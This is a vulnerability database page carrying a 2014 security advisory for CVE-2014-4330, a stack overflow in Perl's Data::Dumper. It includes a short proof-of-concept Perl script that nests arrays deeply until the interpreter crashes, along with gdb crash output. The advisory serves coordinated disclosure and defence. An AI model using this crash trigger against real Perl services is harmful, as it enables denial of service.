Perl 5.20.1 Deep Recursion Stack Overflow

2014.09.26
Credit: LSE
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-06-10 === Perl CORE - Deep Recursion Stack Overflow ----------------------------------------- Affected Versions ================= Perl v5.20.1 and below Issue Overview ============== Vulnerability Type: Stack Overflow Technical Risk: high Likelihood of Exploitation: low Vendor: Perl Vendor URL: http://www.perl.org Credits: LSE Leading Security Experts GmbH employee Markus Vervier Advisory URL: https://www.lsexperts.de/advisories/lse-2014-06-10.txt Advisory Status: Public CVE-Number: CVE-2014-4330 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4330 Impact ====== When the runtime stack grows over its maximal size, a guard page on most modern operating systems is hit causing the Perl interpreter to crash. Depending on context code execution on some architectures might be possible if certain conditions are met. Issue Description ================= During internal development a stack overflow was discovered when serializing data via the Data::Dumper extension which is part of Perl-Core. By using the "Dumper" method on a large Array-Reference which recursively contains other Array-References, it is possible to cause many recursive calls to the DD_dump native function and ultimately exhaust all available stack memory. Temporary Workaround and Fix ============================ Applications written in Perl should ensure that a sanity check on data serialized by Data::Dumper is performed. According to the vendor a patch is available and coordinated with downstream vendors. Proof of Concept ================ $ cat min.pl use strict; use Data::Dumper; my $dumpme = []; for (my $i = 0; $i < $ARGV[0]; $i++) { $dumpme = [$dumpme, "AAAAAAAA"]; } print Dumper($dumpme); $ gdb --args perl min.pl 20000 GNU gdb (GDB) 7.4.1-debian Copyright (C) 2012 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /usr/bin/perl...Reading symbols from /usr/lib/debug/usr/bin/perl...done. done. (gdb) run Starting program: /usr/bin/perl min.pl 20000 warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7ffff7ffa000 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. _IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld", ap=0x7fffff7ff6f0) at vfprintf.c:1328 1328 vfprintf.c: No such file or directory. It was confirmed that the overflow can be triggered via the XML::Parser extension when parsing and dumping specially crafted XML-Documents. History ======= 2014-06-10 Issue discovery during internal development 2014-06-11 Vendor contacted 2014-06-11 Vendor reply 2014-06-13 CVE requested 2014-07-01 Vulnerability confirmed by vendor 2014-07-02 CVE-2014-4330 assigned 2014-09-25 Advisory released GPG Signature ============= This advisory is signed with the GPG key of the LSE Leading Security Experts GmbH advisories team. The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc

References:

https://www.lsexperts.de/advisories/lse-2014-06-10.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top